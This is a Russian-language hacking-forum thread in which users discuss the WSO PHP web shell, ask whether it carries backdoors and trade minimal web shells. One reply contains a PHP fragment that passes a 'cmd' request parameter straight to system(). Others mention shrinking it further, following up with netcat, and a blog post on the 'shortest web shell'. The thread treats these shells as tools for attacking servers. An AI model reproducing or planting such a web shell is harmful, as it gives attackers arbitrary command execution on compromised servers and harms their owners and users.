HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.05.2022, 17:42
ArsenalWest
Новичок
Регистрация: 28.05.2022
Сообщений: 9
С нами: 2086604

Репутация: 0
По умолчанию

https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php

Кто имеет возможность проверьте плз, нет ли вшитых бэкдоров, пожалуйста.
 
Ответить с цитированием

  #2  
Старый 29.05.2022, 18:30
.Method
Новичок
Регистрация: 17.12.2018
Сообщений: 0
С нами: 3898143

Репутация: 0
По умолчанию

Около 1,500 строк кода)))
 
Ответить с цитированием

  #3  
Старый 29.05.2022, 18:55
Exited3n
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами: 2086530

Репутация: 0


По умолчанию

Цитата:

ArsenalWest сказал(а):

https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php

Кто имеет возможность проверьте плз, нет ли вшитых бэкдоров, пожалуйста.

Держи проверенный, вшитых бэкдоров и стучалок нет.

PHP:


Код:
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
 
Ответить с цитированием

  #4  
Старый 29.05.2022, 20:29
fuzzz
Новичок
Регистрация: 03.02.2019
Сообщений: 0
С нами: 3829524

Репутация: 0
По умолчанию

Цитата:

Exited3n сказал(а):

Держи проверенный, вшитых бэкдоров и стучалок нет.

PHP:


Код:
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
Можно еще меньше

PHP:


Код:

Данный код эквивалентен коду

PHP:


Код:

Дальше можно уже через netcat

Код:


Код:

Читайте античат, учите пхп
 
Ответить с цитированием

  #5  
Старый 30.05.2022, 09:01
batu5ai
Новичок
Регистрация: 31.01.2018
Сообщений: 0
С нами: 4359276

Репутация: 0
По умолчанию

Цитата:

fuzzz сказал(а):

Можно еще меньше

PHP:


Код:

Данный код эквивалентен коду

PHP:


Код:

А где можно про это почитать? На офсайте и на sof так себе доркается, по античату тоже(втч с байпасом)... нужно "стараться" лучше или я копаю в неправильном направлении?
Можно ссыль на офдоки\статью\книгу, плз?
 
Ответить с цитированием

  #6  
Старый 30.05.2022, 21:00
MLNK
Новичок
Регистрация: 23.01.2018
Сообщений: 0
С нами: 4371257

Репутация: 0
По умолчанию

Цитата:

ArsenalWest сказал(а):

https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php

Кто имеет возможность проверьте плз, нет ли вшитых бэкдоров, пожалуйста.

Никто подобным заниматься не будет(по чьей-то просьбе). Тем более за бесплатно. + подумай сам, если я даже там найду бэкдор. Зачем мне об этом говорить )
 
Ответить с цитированием

  #7  
Старый 30.05.2022, 21:29
fuzzz
Новичок
Регистрация: 03.02.2019
Сообщений: 0
С нами: 3829524

Репутация: 0
По умолчанию

Цитата:

batu5ai сказал(а):

А где можно про это почитать? На офсайте и на sof так себе доркается, по античату тоже(втч с байпасом)... нужно "стараться" лучше или я копаю в неправильном направлении?
Можно ссыль на офдоки\статью\книгу, плз?

Вроде как раз в старых доках это и было описано или еще где-то не помню уже. Но вообще смотри старые темы античата и рдот в том числе. Старые мемберы много чего придумали и изучили.

Самый маленький шелл?

Нужно шелл размером в 5кб ничего меньше 19кб не нашел( из функционала требуется кнопка для загрузки файла на сервер

forum.antichat.com


Мега релиз: самый короткий шелл =) | Raz0r.name

Представляю новый релиз - самый короткий в мире веб-шелл на PHP (всего 10 байт), серьезно не воспринимать! =) Итак, та-дам: Если код показался вам непонятным, то сейчас я постараюсь доступно его объяснить. Прежде всего вместо стандартного используется , что эквивалентно ; требуется включенная...

raz0r.name
 
Ответить с цитированием

  #8  
Старый 02.06.2022, 23:26
ArsenalWest
Новичок
Регистрация: 28.05.2022
Сообщений: 9
С нами: 2086604

Репутация: 0
По умолчанию

Цитата:

MLNK сказал(а):

Тем более за бесплатно. + подумай сам, если я даже там найду бэкдор. Зачем мне об этом говорить )

Ну так пройти мимо уже не вариант? Тема явно не для таких как ты создана.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.